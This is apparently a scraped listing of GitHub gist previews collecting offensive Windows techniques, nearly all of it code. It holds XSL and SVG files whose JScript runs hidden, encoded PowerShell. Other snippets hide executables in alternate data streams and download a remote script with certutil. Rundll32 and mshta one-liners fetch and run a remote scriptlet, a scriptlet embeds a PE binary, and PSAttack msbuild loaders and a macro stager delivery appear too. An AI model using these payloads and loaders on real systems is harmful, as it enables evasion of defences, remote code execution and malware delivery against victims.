This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#@~^fwcAAA==7dUhidzmDr\(64N+^OvJU^I&nKcju+^Sr# IiUvddEEnKh3.kC+ssc2a2r7d7Pqo+:d7`]mul"T77,!(+0diPdi~QdiP]Zub]Did~!X{cid~7iP_77,$^tm]Yd7,!oGcid,7d,_7d,$/4zITi7PZ6GZ77Pid,_7d~,1tCDY7d,!a{2dd~7iPQdi~]Z4mDYdd,!Xfbid~diPQ7iP$;4bMTdi~T(ysid~d7~3d7P]^CmID7iP!a+wd7Pi7,_7iP]mtzIY7d,!avyd7~idP37d,$Z_C.Tid,!pv17iP7d,QdiP,^4bDD7iPT6F*id~id,_diP]/CmDDdiPTp+ di~diP_i7~$;CmIDd7~Z({*i7Pid~QidP,/4b.Ti7,!a+&idPid,QdiP,Z4b.DidPZpv~dd,77P3diP,muCMT7d,T(+*77,dd~Qid~$14zDDid,!6Fci7Pid~_id~,;tlMDdiP!o+3diPid~_77,$^tm]Tid~Tovs77,d7P37iP,;CzDTid,T(F 7d,d7~3dd,,m4bDY77PZ(+G7d~7iPQdi~$1t)]Ydd~TX odi~id~3diP$;tm.Tid~!ovo7iPdi~_idP]^4b"Tid~!p2d7Pi7P3d7~]mCC.Yd7PZaFc7iPidP3di~$1tCDYd7~Z6vw7d,dd,Q7d,$1C)DD7iPT(FTdiP77,_d7~]Z4lMDid~Z(F*diPi7P3d7P]Zu)MTdi~!oG&i7~diP3d7P,/_l.Ti7PZ6{idP77,_7d,,;tCMTidPZ(F+diP7d,_77,$m_CIYdd,TavwdiP7d~Qid~$;4bMT77,!({Xid~di~3d7,$1tb"Ti7PZ({!id~7iP_i7P]mtz]DdiPZ6+s77,d7P37d,$/4zDT77,!av87iP7iP3dd,$;4bMT7d,!p{Zdd,7d,_di~,m_l"T7d~TXG*di~diPQ7iP$/4mDDdi~Z(fydiPdiP37d,$^CmDD7iP!Xf!idPi7~_id,$/C)]Yd7PZp wd |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version='1.0'?> | |
<stylesheet | |
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" | |
xmlns:user="placeholder" | |
version="1.0"> | |
<output method="text"/> | |
<ms:script implements-prefix="user" language="JScript"> | |
<![CDATA[ | |
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c powERSHElL.ExE -eX ByPASS -nOP -W HiDDeN -Ec CQAgACAAKAAJACAAIABOAGUAVwAtAE8AQgBKAGUAYwB0AAkADAAgACgAIAAJACAAJwBzAHkAUwBUAGUAbQAuAE4ARQAnACAADAAJACAADAAJACsAIAAMAAkAJwB0AC4AdwAnACAADAAJACAADAAJACsAIAAMAAkAJwBlAEIAYwBMAEkARQBOACcAIAAMAAkAIAAMAAkAKwAgAAwACQAnAHQAJwAgAAwACQAgAAsAIAApACAADAAgACkALgAoACAACwAgACcARABPAHcATgBMAE8AYQBEACcAIAAJACAAIAAJACAAKwAgAAkAIAAnAGYAaQBMAGUAJwAgAAkAIAAJAAsACQApAC4AaQBOAFYAbwBrAEUAKAAgAAkACQAoAFsAYwBoAEEAUgBdAAkACwAgADAAeAA2ADgACQALACAACQALACAAKwAJAAsAIABbAGMASABBAFIAXQAJAAsAIAAwAHgANwA0AAkACwAgAAkACwAgACsACQALACAAWwBDAGgAQQByAF0ACQALACAAMAB4ADcANAAJAAsAIAAJAAsAIAArAAkACwAgAFsAYwBIAEEAcgBdAAkACwAgADAAWAA3ADAACQALACAACQALACAAKwAJAAsAIABbAGMASABhAFIAXQAJAAsAIAAwAFgANwAzAAkACw |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<RoOT XMlNS = "gzoprjonlbazvntlokftttscrjabkpkyvgrjzxrandsvlmrhedcywllhtcxxbygqaywgbjgiigrfobxmytqjnuoroufxndunwyimlecdygcjttfswcdegeuwfjdfiqugjdkeqsycjcijowjqadwnozznrszzztbnpmjmfkqwprqllwewitcoaqwhztbjaziypvmosqxctwhradjdy"> | |
<script xmlns = "http://Www.W3.OrG/2000/svG" > | |
<![CDATA[ | |
new ActiveXObject("wsCRiPT.sheLL").RuN( '"powErsheLL.EXe" POWersHEll.Exe -eX byPASS -NOp -w hIddEN -EC IAAgAAkAKAAgAAkAIABuAEUAdwAtAE8AQgBKAEUAYwB0AAkAIAAJACgAIAAJAAkAJwBzAFkAcwBUAEUATQAuAE4ARQBUAC4AVwBFAEIAJwAJAAsACQAJAAsACQArAAkACwAJACcAYwAnAAkACwAJAAkACwAJACsACQALAAkAJwBMAGkAJwAJAAsACQAJAAsACQArAAkACwAJACcAZQAnAAkACwAJAAkACwAJACsACQALAAkAJwBOACcACQALAAkACQALAAkAKwAJAAsACQAnAHQAJwAJAAsACQAgAAsAIAApACAACQAgACkALgAoAAkAIAAgACcAZAAnAAkAIAAgAAkAIAAgACsACQAgACAAJwBvACcACQAgACAACQAgACAAKwAJACAAIAAnAFcATgBMAE8AQQBkAEYAJwAJACAAIAAJACAAIAArAAkAIAAgACcASQBsAGUAJwAJACAAIAAgAAwACQApAC4ASQBuAFYATwBLAGUAKAAJAAkACQAoAFsAYwBIAEEAUgBdACAAIAAJADAAeAA2ADgAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMASABBAHIAXQAgACAACQAwAHgANwA0ACAAIAAJACAAIAAJACsAIA |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Add content to ADS | |
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe" | |
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe | |
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe | |
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt | |
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab | |
print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe | |
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg | |
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey | |
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC} | |
verclsid.exe /S /C {00000001-0000-0000-0000-0000FEEDACDC} | |
create new folder and rename file.{00000001-0000-0000-0000-0000FEEDACDC} | |
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");close(); | |
mshta javascript:o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");o.Exec();close(); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
progid="17807259" | |
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
<script language="JScript"> | |
<![CDATA[ | |
var sBuffer = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C01030019F6DA580000000000000000E00002010B010B000014000000100000000000009E3200000020000000400000000040000020000000020000040000000000000004000000000000000080000000020000830B0100020040850000100000100000000010000010000000000000100000000000000000000000443200005700000000400000200C0000000000000000000000260000000F0000006000000C0000000C3100001C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E74657874000000A4120000002000000014000000020000000000000000000000000000200000602E72737 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
progid="17807259" | |
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
<script language="JScript"> | |
<![CDATA[ | |
var sBuffer = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C01030019F6DA580000000000000000E00002010B010B000014000000100000000000009E3200000020000000400000000040000020000000020000040000000000000004000000000000000080000000020000830B0100020040850000100000100000000010000010000000000000100000000000000000000000443200005700000000400000200C0000000000000000000000260000000F0000006000000C0000000C3100001C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E74657874000000A4120000002000000014000000020000000000000000000000000000200000602E72737 |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//Credits to Casey Smith for his initial research here "https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371" | |
//Based on Jared Haight work (https://github.com/jaredhaight/PSAttack) | |
//1. Compile "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:PSA64.exe PSA64.cs" | |
using System; | |
using System.Reflection; | |
namespace PSA64 | |
{ | |
class Program | |
{ |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<!-- Based on Casey Smith work (https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371), --> | |
<!-- Based on Jared Haight work (https://github.com/jaredhaight/PSAttack), --> | |
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe PSA_MSBUILD64.csproj --> | |
<Target Name="PSAttack"> | |
<PSA_MSBUILD64 /> | |
</Target> | |
<UsingTask | |
TaskName="PSA_MSBUILD64" | |
TaskFactory="CodeTaskFactory" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
' | |
' Example of DBC2 msbuild.xml stager delivery through a webdav maping | |
' The stager file (msbuild.xml) can be generated from the DBC2 controller | |
' | |
' NOTE: | |
' msbuild.exe is supposed to accept a path straight from a webdav server (ex: msbuild.exe \\webdav_server\msbuild.xml) | |
' but it fails miserably for me, so I have to have to first map the drive... | |
Sub Go() | |
Dim cmd As String, srv As String |
OlderNewer